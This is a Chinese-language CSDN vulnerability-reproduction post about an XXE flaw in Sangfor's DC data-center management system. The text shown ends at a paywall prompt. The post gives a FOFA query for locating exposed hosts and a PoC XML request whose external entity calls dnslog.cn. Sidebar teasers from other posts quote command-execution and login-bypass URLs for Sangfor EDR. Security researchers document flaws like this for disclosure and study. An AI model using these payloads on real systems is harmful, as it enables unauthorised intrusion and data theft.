深信服数据中心管理系统 XXE漏洞复现

0xSecl

已于 2023-08-16 06:14:16 修改

阅读量2.4k

点赞数 2

分类专栏：漏洞复现文章标签：安全 web安全网络安全

于 2023-08-16 06:11:27 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/132310337

版权

漏洞复现专栏收录该内容

871 篇文章 1432 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了深信服数据中心管理系统DC存在的XML外部实体注入漏洞，该漏洞可能导致系统敏感信息泄露。影响范围包括v6.1及以下版本。通过复现环境和PoC，展示了漏洞复现过程，并提供了规避措施，如限制设备端口访问。建议受影响用户升级到v11.0及以上版本以修复问题。

摘要由CSDN通过智能技术生成

0x01 产品简介

深信服数据中心管理系统DC为AC的外置数据中心，主要用于海量日志数据的异地扩展备份管理，多条件组合的高效查询，统计和趋势报表生成，设备运行状态监控等功能。

0x02 漏洞概述

深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析，攻击者可以利用该漏洞进行XML注入攻击，获取系统敏感信息。

0x03 影响范围

v6.1及以下版本

0x04 复现环境

FOFA： "SANGFOR 数据中心"

0x05 漏洞复现

PoC

POST /src/sangforindex HTTP/1.1
Host: your-ip
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
    <!ENTITY rt SYSTEM "http://dnslog.cn">
]>
<xxx>
&rt;
</xxx></

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0xSecl

关注关注

2
点赞
踩
4

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

【1day】复现深信服数据中心管理系统 XXE漏洞——可读取文件

记录并分享学习安全的知识点..

08-16

412

深信服的数据中心管理系统DC是一种外置的AC（异地扩展备份管理）数据中心，它提供了强大的功能和灵活性，旨在满足日志数据处理的需求。该系统具备多种高级功能，包括多条件组合的高效查询、统计和生成趋势报表，以及实时监控设备的运行状态等。深信服数据中心管理系统存在XXE漏洞。

【漏洞复现】深信服下一代防火墙NGAF存在任意文件上传漏洞附POC

失心少年

11-09

876

不仅能够实现网络层访问控制的功能，且能够对应用进行识别、控制、防护，解决了传统防火墙应用层控制和防护能力不足的问题。区别于传统DPI技术的入侵防御系统，深信服NGAF具备深入应用内容的威胁分析能力，具备双向的内容检测能力为用户提供完整的应用层安全防护功能。同样都能防护web攻击，与web应用防火墙关注web应用程序安全的设计理念不同，深信服下一代防火墙NGAF关注web系统在对外发布的过程中各个层面的安全问题，为对外发布系统打造坚实的防御体系。本文所提供的工具仅用于学习，禁止用于其他！

参与评论您还未登录，请先登录后发表或查看评论

【HW2020漏洞回顾】深信服EDR两大漏洞

wuguojie888的博客

08-20

9114

深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理，支持对安全事件的一键隔离处置，以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中，少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞【详情】攻击者可以通过构造payload绕过登录判断，直接拿到系统管理员/用户权..

深信服应用交付管理系统远程命令执行漏洞复现

薛定谔嘚喵博客

09-07

1262

深信服应用交付管理系统login存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令。

深信服行为感知命令执行漏洞

剁椒鱼头没剁椒的博客

01-18

4816

深信服 行为感知系统c.php远程命令执行漏洞，使用与EDR相同模板和部分文件导致命令执行。其实整个过程和深信服EDR命令执行漏洞差不多。其实整个URL和EDR差不多。

深信服技术认证之找回密码漏洞

sangfor_edu的博客

05-07

1836

找回密码漏洞概述找回密码是逻辑漏洞中密码重置的一种场景，经常出现在用户找回密码页面等涉及到网站密码重置的页面。攻击者在用户登录页面，没有获取到用户的账号和密码，无法查看该用户的账户信息，想通过找回密码的位置尝试绕过安全验证，从而重置用户密码，再进行登录，查看相关的账户信息。找回密码的步骤 1、确认用户：输入用户的账号、手机号或者邮箱等； 2、安全验证：触发服务端下发验证码到接收的手机或邮箱，安全验证用户身份； 3、密码重置：输入新密码和确认新密码； 4、登录账号：重置密码成功，利用重置的新密

细节揭示：XXE漏洞复现步骤及安全防护建议

weixin_43263566的博客

08-31

316

XXE漏洞发生在那些使用XML解析器处理用户提供的XML输入的应用程序中。攻击者通过在用户输入的XML文档中插入恶意的实体引用，来触发XML解析器加载外部实体。这些外部实体可能指向本地文件系统或通过网络访问的远程资源。

Adobe Magento OR Commerce电子商务系统 XXE漏洞复现(CVE-2024-34102)

最新发布

0xSec

06-28

925

2024年6月，Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞，攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件，或者结合CVE-2024-2961 可能造成远程代码执行。

深信服EDR任意用户登录与命令执行漏洞

剁椒鱼头没剁椒的博客

01-18

4458

终端检测响应平台（EDR）是深信服公司提供的一套终端安全解决方案，方案由轻量级的端点安全软件（Agent）和管理平台（MGR）共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查，支持微隔离的访问控制策略统一管理，支持对安全事件的一键隔离处置，以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。

【1day】复现深信服应用交付管理系统 login 远程命令执行漏洞和账号密码泄漏漏洞

记录并分享学习安全的知识点..

08-16

800

深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问，导致账号密码泄漏；深信服 应用交付管理系统 login 存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令。

某信服EDR终端检测响应平台RCE漏洞

cj_Hydra's Blog

08-18

4923

前言：这个平台是干嘛的，这里就不废话了，刚好赶上了护网期间爆出来的，回头就被告知护网结束，这里简单复现一下。复现：第一步：通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。第二步：随缘点击进去一个来到主界面，也就是这个样子。第三步：构造payload，这里漏洞文件是c.php，漏洞参数是host /tool/log/c.php?strip_slashes=system&host=id 直接root权限反弹shell。 ...

深信服EDR终端检测响应平台漏洞_2020HW

薄炙厚词的博客

08-21

1384

深信服edr 2020HW 0day 远程命令执行漏洞远程代码执行漏洞任意用户登陆漏洞免密码登陆 Payload 使用浏览器访问 https://ip:prot/ui/login.php?user=任意字符原文链接远程命令执行使用浏览器访问 https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoami https://ip:prot/tool/log/c.php?strip_slashes=system&ho

【漏洞复现】某厂商NGAF防火墙任意文件读取漏洞

晚风不及你

02-29

1164

深信服下一代防火墙NGAF专注网络边界安全效果，通过应用丰富的安全创新防御技术和简单易用的产品设计理念，不仅增强网络边界的安全检测与防控能力，而且实现网络安全风险可视化展示与快速处置，让组织网络边界安全建设更有效、更简单。

深信服EDR任意用户登录漏洞复现

afei001

01-19

745

目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.漏洞修复 1.漏洞概述 2020年HW行动时爆出的深信服EDR漏洞除了前面复现的CNVD-2020-46552深信服EDR远程代码执行漏洞，还有一个EDR任意用户登录漏洞，该漏洞没有CNVD编号。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查，支持微隔离的访问控制策略统一管理，支持对安全事件的一键隔离处置，以及热点事件IOC的全网威胁定位。 2.影响版本 ...

深信服EDR终端检测平台-RCE漏洞复现

thelostworld

08-18

2225

昨晚通宵，刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE 自己也来看看。简介： EDR简介（来自官方）：终端检测响应平台（EDR）是深信服公司提供的一套终端安全解决方案，方案由轻量级的端点安全软件（Agent）和管理平台（MGR）共同组成。 EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查，支持微隔离的访问控制策略统一管理，支持对安全事件的一键隔离处置，以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服

技术分享某下一代防火墙远程命令执行漏洞分析及防护绕过_深信服下一代防火墙ngaf login远程命令执行漏洞

2401_83621634的博客

04-14

868

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！

CNVD-2020-46552 深信服EDR命令执行漏洞

nnn2188185的博客

03-22

993

深信服终端监测响应平台（EDR）存在远程命令执行漏洞。攻击者可通过构造HTTP请求来利用此漏洞，成功利用此漏洞的攻击者可以在目标主机上执行任意命令。